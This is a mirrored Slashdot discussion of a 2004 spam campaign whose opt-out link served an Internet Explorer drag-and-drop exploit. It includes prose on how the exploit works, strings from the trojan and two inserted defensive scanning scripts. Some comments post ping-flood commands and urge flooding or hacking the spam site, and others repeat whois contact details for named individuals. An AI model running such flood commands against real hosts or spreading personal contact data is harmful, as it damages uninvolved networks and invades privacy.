Slashdot Mirror


Spam Opt-out Link Triggers Malicious Code Attack

Maestro4k writes "The Register is reporting on a new spam e-mail circulating out there. In it, clicking on the 'Click here to remove' link launches a site that, when the user scrolls the page, triggers a drag-drop JavaScript exploit. Scarily, the e-mail actually complies with the CAN-SPAM Act, as it only requires spammers to put an opt-out link in their mailings. As The Reg says, "It comes as little surprise that this feature has been taken advantage of in a social engineering exploit; but it does illustrate the security problems of the opt-out approach that were always apparent to security experts - and ignored by legislators." The link in question points to www. xcelent.biz (as in The Reg story, space intentionally included), so even if you can't block the mail yet it should be easy to block access to the site with the exploit. I suspect this is just the beginning and most spam will include "features" such as this in the near future."

327 comments

  1. devious by hendridm · · Score: 4, Informative

    Fortunately, there is a patch for it, Mozilla is unaffected, and Norton and McAfee (at minimum) seem to detect it. That just leaves the millions of unpatched Windows machines that are running out-dated or low-grade antivirus!

    1. Re:devious by Anonymous Coward · · Score: 1, Informative

      For the lazy, the link in the article didn't work. For the lazy people who don't want to type, the link to the cited site is (www.xcelent.biz); but it's recommended you RTFA first to see what's on the site, and choose your browser carefully before clicking. Links like this make goatse look tame.

    2. Re:devious by iamacat · · Score: 0, Troll

      Here is a link that will give their server some grief without running the trojan. Then again, they might put it there later, so I still wouldn't run it from IE. Maybe do "Save as" instead of open?

    3. Re:devious by magarity · · Score: 1

      Since this is an IE exploit, I hit the parent's link with Mozilla and was told that my email address was removed from the database. WTF email address was "removed"? It looks like a completely bogus opt-out since they don't check that you've even submitted an email addy to be removed, nevermind actually finding and removing a record in their database. Yet the /. article states that the spams in question comply with the requirement of having a removal link. What good is a removal link that says you're removed when really no such thing happened??? I especially love the 'click here to enter more email addys to be removed'. I'll bet $20 that's just a harvesting technique.

    4. Re:devious by jargoone · · Score: 1

      Wow. Just... wow.

      Yet the /. article states that the spams in question comply with the requirement of having a removal link. What good is a removal link that says you're removed when really no such thing happened???

      The requirement is that they have a link to opt out. There is a link to opt out. The page linked to doesn't actually allow you to opt out, but that's a problem with the "rule", not this particular spammer!

      I especially love the 'click here to enter more email addys to be removed'. I'll bet $20 that's just a harvesting technique.

      I'll give you $20 on the condition that you start reading your email by telnetting into the POP server.

    5. Re:devious by temojen · · Score: 1
      choose your browser carefully before clicking.

      I recommend wget for this purpose.

      If you just want to snag a copy of the trojan for analysis, here it is!

    6. Re:devious by Anonymous Coward · · Score: 0

      That just leaves the millions of unpatched Windows machines that are running out-dated or low-grade antivirus...

      Incomplete statement

      ...again!
      ...still!
      ...Goddamnit!

    7. Re:devious by Three+Headed+Man · · Score: 1

      I'm still having trouble getting it to work in Wine.

      --
      I'm probably at the karma cap. Mod up a funny troll instead, it lightens the mood :)
    8. Re:devious by Anonymous Coward · · Score: 1, Funny

      Just one more reason why Linux isn't ready for the desktop...

      oh wai

    9. Re:devious by interJ · · Score: 2, Interesting
      What patch? This vulnerability affects Win XP SP2 with all updates installed. See here for more info and a harmless demonstration.

      This is a bug that has been known publicly for over a month, but apparently Microsoft have other priorities.

    10. Re:devious by Mycroft_VIII · · Score: 1

      You don't telnet into yours? Seriously, I used to have to do just about that to un-fubar my father's e-mail account. Seems the support people at Earthlink 'don't support the telnet e-mail client' when I try to describe how I KNOW the problem is at their end and not caused by Outlook Express having a wrong setting.
      Now if I can just convince my uncle to stop sending attachments of TEXT of all things to everyone he knows from his win3.11 system (he refuses to upgrade because it works and nothing good has come out since the amiga anyway.)

      Mycroft

      --
      https://signup.leagueoflegends.com/?ref=4c3ed6600b6ea
  2. Microsoft says "No Problem" by Anonymous Coward · · Score: 5, Funny
    Don't worry, this isn't a real problem:
    "Given the significant amount of user action required to execute an attack, Microsoft does not consider this to be a high risk for customers," a company representative said, adding that the software giant's security experts are continuing to research the issue.

    I mean, using a scrollbar. Come on, what kind of ignorant user is going to use a scrollbar on a site they don't trust? ;-)
    1. Re:Microsoft says "No Problem" by Anonymous Coward · · Score: 5, Informative

      Here is the pertinent CERT advisory for this flaw.

      The idea is that all the website designer has to do is make an image that LOOKs like a scrollbar. The user goes and clicks and drags it to scroll down, not knowing it's fake. If there is a DYNSRC="..." attribute specified in the <IMG...> tag, Internet Explorer downloads and runs whatever program is specified, without any kinds of prompts whatsoever.

      Even with SP2 installed.

    2. Re:Microsoft says "No Problem" by Anonymous Coward · · Score: 0

      God, that seems like too much trouble for me. They need to click a link sent in an e-mail, then click and drag a fake scrollbar? Why not use the JPEG buffer overflow exploit to get their code onto the computer instead- An HTML e-mail with the JPEG embedded in it will do just fine. All the user has to do is read his e-mail and BANG! ZOOM! PWNED!

    3. Re:Microsoft says "No Problem" by Anonymous Coward · · Score: 2, Informative
      This is my favorite part:

      III. Solution

      Disable Drag and drop or copy and paste files
      Disabling the zone security preference "Drag and drop or copy and paste files" prevents drag and drop operations.

      Note: This preference is not honored with Windows XP operating systems.

      Oh-well, at least it won't affect my Linux and OS/2 boxes if I turn that off.
    4. Re:Microsoft says "No Problem" by Anonymous Coward · · Score: 0

      Good thing i have a scrollwheel on my mouse :)

    5. Re:Microsoft says "No Problem" by NineteenSixtyNine · · Score: 0, Insightful

      what kind of ignorant user is going to use a scrollbar on a site they don't trust?

      The same kind that use a browser they can't trust.

      --
      What would Bill Clinton do?
    6. Re:Microsoft says "No Problem" by fymidos · · Score: 2, Funny

      oh, come on now, it was just a typo, what they meant was that it is not a high risk for MS *intellimouse* customers.

      --
      Washington bullets will simply be known as the "Bulle
    7. Re:Microsoft says "No Problem" by bheerssen · · Score: 5, Interesting

      Yep, exactly right.

      For the curious, here is an interesting post that describes the exploit at some length. Essentially, it uses an HTML 'dynsrc' attribute (proprietary Microsoft extension) to allow IE to download the executable, and javascript to use the 'shell:' protocol to execute it. It's not a particularly new flaw, but this is the slickest exploit of it I've seen.

      --
      (Score: -1, Stupid)
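
A defensive check for the combination described in the comments above (an IMG `dynsrc` attribute plus a `shell:` reference in script), as an added example that is not part of the original thread or the CERT advisory. The extension list, the verdict names and both sample pages are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit
import re

# Assumption: file extensions a mail or web gateway treats as executable content.
EXECUTABLE_EXT = (".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".hta")
# \b keeps words such as "eggshell:" from matching. Obfuscated script will evade this.
SHELL_URI = re.compile(r"\bshell:", re.IGNORECASE)


class DragDropScanner(HTMLParser):
    """Collects (kind, detail) findings; HTMLParser lowercases tag and attribute names."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
        for name, value in attrs:
            value = (value or "").strip()
            if name == "dynsrc":
                try:
                    path = urlsplit(value).path.lower()
                except ValueError:          # malformed URL: fall back to the raw value
                    path = value.lower()
                kind = ("dynsrc-executable" if path.endswith(EXECUTABLE_EXT)
                        else "dynsrc-other")  # e.g. a video clip
                self.findings.append((kind, f"<{tag}> {value}"))
            elif SHELL_URI.search(value):
                self.findings.append(("shell-uri-in-attr", f"<{tag} {name}> {value}"))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and SHELL_URI.search(data):
            self.findings.append(("shell-uri-in-script", data.strip()[:80]))


def scan(html_text):
    """Return (verdict, findings). Both indicators together -> block; one alone -> review."""
    scanner = DragDropScanner()
    scanner.feed(html_text)
    scanner.close()
    kinds = {kind for kind, _ in scanner.findings}
    has_shell = bool(kinds & {"shell-uri-in-attr", "shell-uri-in-script"})
    if "dynsrc-executable" in kinds and has_shell:
        verdict = "block"
    elif "dynsrc-executable" in kinds or has_shell:
        verdict = "review"
    else:
        verdict = "allow"
    return verdict, scanner.findings


# Constructed sample pages (placeholders only, not taken from the site in the story).
BENIGN_PAGE = ('<html><body><img src="logo.png" alt="eggshell: white">'
               '<img dynsrc="clip.avi"></body></html>')
SUSPECT_PAGE = """<html><body>
<IMG SRC="scrollbar.gif" DYNSRC="http://example.invalid/PLACEHOLDER.EXE?x=1">
<script>var target = "shell:PLACEHOLDER";</script>
</body></html>"""

if __name__ == "__main__":
    for label, page in (("benign", BENIGN_PAGE), ("suspect", SUSPECT_PAGE)):
        verdict, findings = scan(page)
        print(label, verdict)
        for kind, detail in findings:
            print("   ", kind, detail)
```
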
    8. Re:Microsoft says "No Problem" by Psykechan · · Score: 1

      Yep. This is precisely why I always use a scroll wheel to navigate. I'm not going to be caught off guard by this sort of scam.

      Ooh look! What a pretty JPEG.

    9. Re:Microsoft says "No Problem" by microsopht · · Score: 1
      Hi dude~!
      I am getting paranoid of clicking any link in Slashdot!

      Clicking on the gmail invites took me to a bloody porn page, in spite of having the caption [Google] provided faithfully by slashdot.
      Luckily (or so I think) I was using firefox - but still the porn page, with shaking windows and a horrible voice (SWF) hit me.

      Could clicking on the link have damaged my comp? Anything could have been installed?

      Please, how to know which links to trust? - since even the properties / caption box [google] are ineffective.

    10. Re:Microsoft says "No Problem" by Anonymous Coward · · Score: 1, Informative

      Make sure that you see the link does not have I'm feeling lucky in it, you can copy paste it to notepad if you like to decipher it. Right click, copy link address.

      if btnG is in the link (as in btnG=Google+Search) then it's a search, if btnI is, it's I'm feeling lucky, and will take you directly to the url. Same if http:// is in the url, as google believes you meant to go to that address.
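
The link check described in the reply above, written out as an added example (not part of the original thread). It assumes the parameter names are matched case-insensitively and uses constructed sample links; it also shows why a domain caption alone cannot tell a search link from a redirect.

```python
import re
from urllib.parse import urlsplit, parse_qs

_HAS_SCHEME = re.compile(r"^[A-Za-z][A-Za-z0-9+.-]*://")


def classify_google_link(url):
    """Classify a copied link address.

    Returns one of:
      "not-google"      host is not google.com or a subdomain of it
      "lucky-redirect"  btnI present: the click lands on a third-party page
      "search-results"  btnG present: the click lands on a results page
      "google-other"    a Google URL with neither parameter
    """
    url = url.strip()
    if not _HAS_SCHEME.match(url):
        url = "http://" + url              # pasted links often lack the scheme
    parts = urlsplit(url)
    host = (parts.hostname or "").lower().rstrip(".")
    # Exact match or a true subdomain. A look-alike such as
    # "www.google.com.example.net" or "www.google.com@example.net" must fail.
    if host != "google.com" and not host.endswith(".google.com"):
        return "not-google"
    # keep_blank_values so a bare "&btnI" with no value is still seen.
    names = {n.lower() for n in parse_qs(parts.query, keep_blank_values=True)}
    if "btni" in names:                     # checked first: the riskier outcome wins
        return "lucky-redirect"
    if "btng" in names:
        return "search-results"
    return "google-other"


# Constructed sample links. The first two would carry the same domain caption.
SAMPLE_LINKS = [
    "http://www.google.com/search?q=gmail+invite&btnG=Google+Search",
    "http://www.google.com/search?q=gmail+invite&btnI=I%27m+Feeling+Lucky",
    "www.google.com/search?q=gmail+invite&BTNI",
    "http://www.google.com.example.net/search?q=x&btnG=1",
    "http://www.google.com@example.net/search?btnG=1",
]

if __name__ == "__main__":
    for link in SAMPLE_LINKS:
        print(f"{classify_google_link(link):15} {link}")
```
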

  3. I dont know about you by OverlordQ · · Score: 4, Informative
    but my AntiVirus has detected this exploit for a *long* time.

    JS/Exploit-DragDrop.b.gen
    --
    Your hair look like poop, Bob! - Wanker.
    1. Re:I dont know about you by NeoSkandranon · · Score: 1

      Yeah except you update your defs don't you?

      Seriously though, I've seen computers bought less than a month previously that ALREADY have their subscription expired due to the length of time the computer sat at the store---it's not surprising to think that even new-ish computers might not have either the patch or the virus defs

      --
      If you can't see the value in jet powered ants you should turn in your nerd card. - Dunbal (464142)
    2. Re:I dont know about you by Anonymous Coward · · Score: 1, Informative

      No excuse..

      http://www.free-av.com/
      http://free.grisoft.com/freeweb.php/doc/2/

    3. Re:I dont know about you by Anonymous Coward · · Score: 0

      ClamAV is probably the best, most up-to-date free anti-virus software out there currently. The link is for the Windows version.

      For Linux just "apt-get install clamav". You do use Debian, right?

    4. Re:I dont know about you by Red+Alastor · · Score: 1

      We also get the goodies in non-Debian distros. For Fedora it's : yum install clamav

      --
      Slashdot anagrams to "Sad Sloth"
    5. Re:I dont know about you by orangesquid · · Score: 4, Informative

      A simple string analysis of the trojan reveals some intimidating-looking strings:
      GetSystemDirectoryA, xProxyBot v 1.0.0, 1.0.0, w32.exe,
      Windows Service Application, www.earthlabs.biz,
      sockproxy/rec.php.
      Software\Microsoft\Windows\CurrentVersion\Run
      Software\Microsoft\Windows\CurrentVersion\RunServices
      %s?&p=%d&v=%s
      VisitWebPageThread, Socket4RandomThread, Socket4ServerThread
      SYSTEM\CurrentControlSet\Control\SafeBoot\
      explorer.exe
      Mozilla/4.0 (compatible)
      InternetCloseHandle, InternetGetLastResponseInfoA
      InternetReadFile, InternetCrackUrlA
      InternetOpenUrlA
      InternetOpenA, InternetConnectA
      FtpPutFileA, FtpGetFileA
      HttpSendRequestA, HttpOpenRequestA
      InternetGetConnectedStateEx, InternetGetConnectedState

      --
      --TheOrangeSquid Is it any wonder things seem so awry? We swim in a sea of confusion and don't have to think to survive
    6. Re:I dont know about you by waynelorentz · · Score: 1

      No excuse..

      http://www.apple.com/
      http://www.linux.org/

  4. interesting strings by Anonymous Coward · · Score: 3, Informative

    the executable contains the strings "xProxyBot v 1.0.0" and www.earthlabs.biz/sockproxy/rec.php.

    1. Re:interesting strings by Anonymous Coward · · Score: 2, Informative

      Virus Scan for Linux v4.32.0
      Scan engine v4.3.20 for Linux.
      Virus data file v4394 created Sep 22 2004

      Identified it as:

      $ uvscan --secure windows-update32.exe
      /home/recall/windows-update32.exe
      Found the BackDoor-CHP trojan !!!

    2. Re:interesting strings by temojen · · Score: 1

      Also:

      Microsoft Visual C++ Runtime Library

      and xProxyBot returns no results in google, but ProxyBot returns 248, few of them trojan related.

    3. Re:interesting strings by Anonymous Coward · · Score: 0

      What's really interesting about that is the whois lookup information... the company that owns that website is known as AskFindPay from Hong Kong... and the xcelent website is property of Chunghwa Telecom Co. in Taipei. Say... who else wants to send a few hundred of these emails back to the domain owners? ::Evil grin::

    4. Re:interesting strings by Carnildo · · Score: 1

      Thanks! Now I can label it properly for my collection!

      --
      "They redundantly repeated themselves over and over again incessantly without end ad infinitum" -- ibid.
  5. More Legislation Needed. by FearTheFrail · · Score: 3, Insightful

    So now that we have a legal, malicious attack, we'll only have to wait a few -more- years for bills to be passed to have the law catch up with some watermark of digital exploitation. Super.

    --
    ___ In the words of Gen. Douglas McArthur: "I'll be right back."
    1. Re:More Legislation Needed. by auzy · · Score: 3, Insightful

      Actually, I think that's the wrong approach. I just think vendors like Microsoft need to take responsibility for the poor security in their products.. Many exploits against windows products for instance were long known to come out before they were released, amongst many others. There was a time when eeye had serious exploits listed that took Microsoft longer than 100 days to fix.

      Also, from past experience, legislation is often abused in computer cases (as demonstrated by people like the RIAA). Personally, it's been pretty rare to see decent laws against computer crimes (I haven't heard of any I agree with so far).

      I think the development of sender verification frameworks for Email will also eventually help, provided that MS is willing to accept the open standards for once.

    2. Re:More Legislation Needed. by stratjakt · · Score: 5, Insightful

      There's nothing legal about this.

      It's not specifically illegal under the CAN-SPAM act, but it's just as illegal as any other exploit, trojan or worm.

      --
      I don't need no instructions to know how to rock!!!!
    3. Re:More Legislation Needed. by Anonymous Coward · · Score: 0

      But by clicking the link you expressed assent...

    4. Re:More Legislation Needed. by stratjakt · · Score: 1

      Assent isn't a word.

      And noone expressed "consent" to have their machine hijacked by an IE exploit.

      It's not legal, and the only reason it's online is because it's on some shady Taiwanese host.

      --
      I don't need no instructions to know how to rock!!!!
    5. Re:More Legislation Needed. by Anonymous Coward · · Score: 0

      > Assent isn't a word.

      Yes it is.

    6. Re:More Legislation Needed. by Anonymous Coward · · Score: 0

      You went to the web page of your own free will, using something known to be bad. Caveat Emptor.

      Main Entry: 1assent
      Pronunciation: &-'sent, a-
      Function: intransitive verb
      Etymology: Middle English, from Old French assenter, from Latin assentari, from assentire, from ad- + sentire to feel -- more at SENSE
      : to agree to something especially after thoughtful consideration : CONCUR

    7. Re:More Legislation Needed. by ColdGrits · · Score: 1

      " Assent isn't a word."

      Are you sure about that?

      Assent means To agree, as to a proposal; concur. - http://dictionary.reference.com/search?q=assent

      --
      People should not be afraid of their governments - Governments should be afraid of their people.
    8. Re:More Legislation Needed. by gcaseye6677 · · Score: 4, Insightful

      The government could crack down on most spam sources anytime they feel like taking the problem seriously. With all the business, tax code, interstate commerce, and other regulations on the books already, any spammer is bound to be violating a bunch of existing laws. And since many spamvertized products and services are fraudulent or blatantly illegal, simply prosecuting with traditional laws would be adequate.

      If the IRS started auditing every known spammer with operations or residence in the United States, that would have a very chilling effect on spam. I'd bet my life savings that spammers don't report all of their income for tax purposes. If other countries then followed suit, spam would be relegated to the far corners of the world and easily firewalled.

    9. Re:More Legislation Needed. by Red+Alastor · · Score: 3, Insightful

      And many situations don't need a completely different law when it happens with computers. A fraud is a fraud no matter what the medium you use is and there are already good laws about it.

      --
      Slashdot anagrams to "Sad Sloth"
    10. Re:More Legislation Needed. by mdfst13 · · Score: 3, Insightful

      "You went to the web page of your own free will, using something known to be bad. Caveat Emptor."

      Obviously people here are aware that the site is bad. However, people who actually get the link in an email would be under the impression that the site is an opt out link. Providing them a virus instead is fraud and illegal.

      If "known to be bad" refers to IE, that doesn't excuse anything. That's like saying that if you forget to lock your door, then it's all right for people to steal your stuff. In reality, it's still just as illegal.

    11. Re:More Legislation Needed. by FuzzyBad-Mofo · · Score: 2, Informative

      Assent is a perfectly good word, but noone is not.

      Your braking my hart, I hate to be a looser grammar nazi, but it's these errors witch need two bee preventated.
    12. Re:More Legislation Needed. by musikinov · · Score: 0
      As I see it, the US government will never put an end to spam. What it will likely do is regulate and tax it.

      Your company wants to send out advertisements? Okay, pay your state $0.07 per e-mail and you can bulk mail all you like.

    13. Re:More Legislation Needed. by xouumalperxe · · Score: 2, Insightful

      Oh, they'll agree to the standards alright. And 2 days later they publish the new and improved version of your standard, with super-duper (and highly exploitable) proprietary extensions that mean MS is so much better than the competition. Accepting open standards isn't the problem with MS. It's the staying within them that's the trick.

    14. Re:More Legislation Needed. by Warhaven · · Score: 1

      They should cover their bases and start including an EULA with their malware: "By downloading this software, you agree that we are not responsible for any damages that may incur through use of this product, either directly or indirectly."

    15. Re:More Legislation Needed. by Mycroft_VIII · · Score: 1

      No, going to a website to opt out of an e-mail is not agreeing to download a trojan or other malware or otherwise have your computer hijacked.
      It's like saying because you entered a shopping mall you assented to having your car hotwired and driven at 180 mph by the guys from the food court because you parked in their parking lot.

      Mycroft

      --
      https://signup.leagueoflegends.com/?ref=4c3ed6600b6ea
    16. Re:More Legislation Needed. by Gopal.V · · Score: 1

      > That's like saying that if you forget to lock your door, then it's all right for people to steal your stuff. In reality, it's still just as illegal.

      But you still lose out on your insurance ... being "Stupid" has its own costs.

      More people have to know that browsing with IE is the equivalent of buying a bicycle lock for your house. Of course, it will stop any decent guy from entering the house, but the first thief with a pair of pliers will go in :)

      Hmm.. I wonder how "Security through Obscurity" works for Microsoft ... they are the most COMMON boxes and it just makes the job easier.

    17. Re:More Legislation Needed. by Anonymous Coward · · Score: 0

      "people who actually get the link in an email would be under the impression that the site is an opt out link. Providing them a virus instead is fraud"

      Presumably if the virus is damaging enough, it would prevent the recipient from receiving email again, thus qualifying as an "opt-out"...? ;-)

  6. Another good reason... by Three+Headed+Man · · Score: 3, Insightful

    ...to get SpamAssassin.

    --
    I'm probably at the karma cap. Mod up a funny troll instead, it lightens the mood :)
    1. Re:Another good reason... by d_jedi · · Score: 1

      Is that even available for Windows? From the spamassassin.apache.org website, it doesn't appear to be. And if it does, does it integrate with Outlook?

      --
      I am the maverick of Slashdot
    2. Re:Another good reason... by Anonymous Coward · · Score: 4, Funny

      ..to get SpamAssassin.

      No. A good reason to hire a Spammer Assassin,
      perhaps.

      Violent, painful death is, after all, the only thing these sleazeballs fear.

    3. Re:Another good reason... by Jord · · Score: 1

      Yes there are tools out there that let you integrate it into outlook. A simple google search will show how it is done.

    4. Re:Another good reason... by d_jedi · · Score: 2, Insightful

      Only link I found for this was:
      http://www.openhandhome.com/howtosa300.html

      Which is a pretty fricking long installation procedure.. most likely beyond the capabilities of anyone who would actually be affected by this exploit (ie. people who haven't applied recent patches, who don't have an up-to-date virus scanner, who click on links in spam messages..)

      In particular, even I (and I consider myself quite knowledgeable) had no clue with this step:

      # Critical: Next, find \perl\bin\spamasasssin.bat (it is probably read-only, which will cause you grief in a second), and add at the beginning (well, nearly: right after the @ECHO OFF line.)

      SET RES_NAMESERVERS=ipaddress
      SET LANG=en_US


      Now, for people running their own DNS server, this isn't a big deal.. but for the rest of us..

      --
      I am the maverick of Slashdot
  7. Greeting from Malaysia by politicsie04 · · Score: 5, Funny

    Whois says that the website is operated by Anandan Krishan from Malaysia, so let's all send him an email, win2save@yahoo.com , complaining that he has discriminated against Firefox, and Linux users of his website, and that in future he should have a more inclusive virus.

    1. Re:Greeting from Malaysia by Nos. · · Score: 3, Informative
      I tried to post the whois for the site as well as the whois for the IP that it's hosted on but gave up when /. said I had too many "junk" characters. Sheesh... here's a quick summary of the IP owner though:

      Yu, Shao
      4F, No. 7, Aly. 7, Lane 355, Sec. 2, Neihu Rd.
      Taipei City
      TW
      Shao Yu (SY167-TW) hn87788676@hn.hinet.net
      +886-9-36-045496

    2. Re:Greeting from Malaysia by Smallpond · · Score: 1

      Hmm...Not Malaysia, address 61.218.79.53

      Country: TW
      Netname: YU-SHAO-E4-TW
      Descr: CHTD, Chunghwa Telecom Co., Ltd.Data-Bldg. 6F, No. 21, Sec. 21, Hsin-Yi
      Rd.,Taipei Taiwan
      Status: ASSIGNED NON-PORTABLE
      Source: TWNIC
      Server: APNIC
      Inetnum: 61.218.79.48 - 61.218.79.63

    3. Re:Greeting from Malaysia by d_jedi · · Score: 1

      Wow, should be easy to find this scumbag and send him to jail for a long time.. where he (assuming he is the virus writer) belongs.

      --
      I am the maverick of Slashdot
    4. Re:Greeting from Malaysia by Anonymous Coward · · Score: 0

      Just paste in the lameness filter, so you have a high enough proportion of words.

    5. Re:Greeting from Malaysia by theparanoidcynic · · Score: 1

      Yeah! Using our mighty software from the future we don't have the pleasure of these amazing exploits.

      Sometimes, when I get bored I fire up my emulated Pentium Pro and take unpatched IE 5 for a spin. It's heartwarming that the internet cares enough to 0wn me within thirty seconds of simply visiting it . . . . .

      --
      Only in a Slashdot fantasy can a Slackware install turn into several hours of sex . . . . .
    6. Re:Greeting from Malaysia by doubtless · · Score: 1

      for the uninformed (apparently not the parent), Anandan Krishan is one of the few billionaires from Malaysia.

      He is the man behind 2 of the most successful companies, Maxis mobile (largest mobile service provider), and Astro (the only satellite TV provider).

      --
      geek page at KY speaks
  8. Dumb by sl8r · · Score: 5, Funny
    Also, the programmer seems to have had fun writing the javascript on that xcelent.biz page. From the source:
    // probably the dumbest scrollbar emulation on this planet ;)
    1. Re:Dumb by Benanov · · Score: 5, Informative

      That comment means it was ripped from a proof-of-concept website published a while ago: http://www.mikx.de/scrollbar/ Amazingly shameless. They stole this guy's code, AND they're using it for phishing attacks.

  9. Why is the site still up? by jarich · · Score: 4, Insightful
    The article says they know the name of the website... why is it still there? Why is the EXE still available?

    I realize that another spammer will take advantage of the hole next week but if the hosters were blacklisted from DNS servers, the offending files might get removed a little faster.

    1. Re:Why is the site still up? by gorbachev · · Score: 5, Funny

      Two possible reasons:

      1. Law enforcement agencies asked to keep it up

      2. Hinet Taiwan doesn't give a shit

      I'm betting on option #2.

      --
      In Soviet Russia, I ruled you
    2. Re:Why is the site still up? by PriceIke · · Score: 1

      Because it hasn't been /.ed yet. Too many warnings to not go there.

      --
      It's not a lie. It's the truth with lossy compression.
    3. Re:Why is the site still up? by mblase · · Score: 1

      I realize that another spammer will take advantage of the hole next week but if the hosters were blacklisted from DNS servers, the offending files might get removed a little faster.

      That would take time. It's much quicker and easier to just slashdot the site.

  10. Useful slashdotting!! by Evan+Meakyl · · Score: 4, Funny

    The link in question points to www. xcelent.biz (As in The Reg story, space intentionally included)

    There should be a real link, in order to /. it!!!

    1. Re:Useful slashdotting!! by savagedome · · Score: 1

      You can install Linkification that allows you "to view plain-text URLs and e-mail addresses as actual links". Well, of course I am assuming you are not running IE!

    2. Re:Useful slashdotting!! by Oliver+Wendell+Jones · · Score: 1

      Linkification doesn't do you any good if it's not a valid URL (i.e., it has a space in it). Other than that, it is one of my favorite extensions.

      --
      A computer once beat me at chess, but it was no match for me at kick boxing -- Emo Phillips
    3. Re:Useful slashdotting!! by amRadioHed · · Score: 1

      You should install the Plain Text Links extension too. With that you select the url then right click and you have an option to open it. The nice thing is this extension filters out white spaces, so it even works for long URL's broken up by slashcode.

      --
      We hope your rules and wisdom choke you / Now we are one in everlasting peace
    4. Re:Useful slashdotting!! by Oliver+Wendell+Jones · · Score: 1

      Woot! Thanks! I love this feature in UltraEdit! Slashdot needs more people like you!

      --
      A computer once beat me at chess, but it was no match for me at kick boxing -- Emo Phillips
    5. Re:Useful slashdotting!! by Anonymous Coward · · Score: 0

      Hmm, can someone please hack that server and upload a different file?

  11. opt out just confirms ur email address by Anonymous Coward · · Score: 1, Informative

    for all the other lists...

  12. Use your powers for good by Mignon · · Score: 4, Interesting

    Why don't we non IE-users use the Slashdot effect for good? Let's all visit the evil site and soon it will be a steaming pile of rubble.

    1. Re:Use your powers for good by datastalker · · Score: 2, Informative

      It's a text site... it will take a lot to Slashdot it!

    2. Re:Use your powers for good by zx75 · · Score: 1

      Yes! Oh, just one note to everyone... Don't use the scroll bar.

      Or better yet, do... it'll increase the traffic to the site ;).

      --
      This is not a sig.
    3. Re:Use your powers for good by BenjyD · · Score: 1

      There's a form pointing at a cgi script at the bottom of the page for "removing your email". I wonder if a script that kept calling that might take up a bit more CPU for them?

    4. Re:Use your powers for good by sockonafish · · Score: 1

      Wheeeee.

      sudo ping -f www.xcelent.biz (I never ping flooding required super user privileges)

    5. Re:Use your powers for good by ElNeo · · Score: 1

      Maybe we could fill the log-file?

    6. Re:Use your powers for good by Anonymous Coward · · Score: 0

      Remove email address?!? Why, certainly!

      president @ whitehouse.gov

    7. Re:Use your powers for good by ElNeo · · Score: 1

      This link (click the link below to show link) sends the first 10.000 numbers of pi as a parameter to an existing script on the evil site. Would fill the error-log in no-time =)

    8. Re:Use your powers for good by Kludge · · Score: 1

      You can use
      ping -s 4096
      to increase the packet size to bring up the load.

    9. Re:Use your powers for good by Masami+Eiri · · Score: 1

      And to add insult to injury, throw in an https://.

    10. Re:Use your powers for good by ElNeo · · Score: 5, Funny

      Like this nice link?
      (click link below to show link...)

    11. Re:Use your powers for good by BenjyD · · Score: 1

      Hmm, I think I just hit a Firefox bug - I copy and pasted that link to my address bar and it appeared with all the text overlapping. And then crashed my X server.
      Maybe it was a stupid thing to do, but not an X-crashingly stupid thing to do.

    12. Re:Use your powers for good by BenjyD · · Score: 1

      Except that wouldn't that also slow down connections for other net users in the same block?

      Not exactly very ethical.

    13. Re:Use your powers for good by Frank+T.+Lofaro+Jr. · · Score: 1

      The site runs Apache (version 2 in fact) on Linux, so how can it be evil?

      --
      Just because it CAN be done, doesn't mean it should!
    14. Re:Use your powers for good by bockman · · Score: 1

      What if they (the evil ones) read slashdot and have placed on the site some content exploiting mozilla flaws and/or opera exploits (uhmmm, this time google got a bit confused )

      --
      Ciao

      ----

      FB

    15. Re:Use your powers for good by Lehk228 · · Score: 1

      brilliant.

      --
      Snowden and Manning are heroes.
    16. Re:Use your powers for good by microsopht · · Score: 1
      Just because a slashdotter has a non IE browser he should click the link for the Slashdot effect? yuck! How many would have the courage to do it, knowing full well that it has malicious code?

      At least, I won't!

    17. Re:Use your powers for good by Anonymous Coward · · Score: 0

      Don't do that.

      You're abusing everyone in between, not just them.

  13. New News? by Kartik3 · · Score: 5, Informative

    Spammers have often used an "unsubscribe" link or something similar only to verify your email address and send you more spam. While not the same as triggering an exploit, I've been under the impression that spammers have taken advantage of users with an "opt out" type of link in this way for quite a while now.

    1. Re:New News? by eqkivaro · · Score: 1

      Good point.

      I'm amazed that anyone clicks on those links. Best case scenario you get an annoying string of web pages; worst case scenario you've just confirmed for the spammer that they've found a live email address.

      -chris

    2. Re:New News? by MillionthMonkey · · Score: 1

      You'd have to be nuts to click on any link at all that arrived via spam. "Unsubscribe" links have been proven time and again to be feedback mechanisms for helping spammers identify good addresses.

      Of course, now that we have HTML email with IMG tags (whoopee.) you don't even need to click on a link anymore.

    3. Re:New News? by gstoddart · · Score: 1

      That's why everyone disagreed with the use of opt-out in the first place.

      Most people don't ever click on the opt-out link for that exact reason. The fact that someone has made it even more dangerous to do so just proves the point.

      As long as they can keep saying "but you haven't opted out" they're safe.

      --
      Lost at C:>. Found at C.
    4. Re:New News? by xouumalperxe · · Score: 1

      "As long as they can keep saying "but you haven't opted out" they're safe." I was under the impression that you had to opt in to start with? so that if push comes to shove and it gets to the courts (provided you track down the bastard), he'd have to PROVE you had given him permission to use the mail somehow. OR is that just european union stuff? I know that in the US you need to say that you DON'T want mail sent to you when you subscribe something (say, creating an acct here at /.), whereas here in the EU you have to specifically say you allow it

  14. lamer is hosted on hinet.com by Indy1 · · Score: 4, Informative

    host www.xcelent.biz
    www.xcelent.biz has address 61.218.79.53
    host 61.218.79.53
    53.79.218.61.in-addr.arpa domain name pointer 61-218-79-53.HINET-IP.hinet.net

    and people wonder why i firewall 60/7

    --
    Lawyers, MBA's, RIAA? A jedi fears not these things!
  15. MIME Defang by alatesystems · · Score: 2, Informative

    This is a good reason to use mime_defang with spamassassin. Either do that or what I do, have it actually attach the message as a .eml file(rfc 822 or whatever) and then you can view it in whatever you want and even reimport it into your mailbox.

    I hate spam, but I haven't had a false positive or negative in forever combining the bayes inside spamassassin with the bayes inside thunderbird.

    Chris

    1. Re:MIME Defang by gmuslera · · Score: 2, Informative
      Or better yet, Anomy Sanitizer. It disables "active" html content (i.e. javascript) attached to mails, can quarantine/rename files by extension, and of course, can call a configurable antivirus to check and take actions.

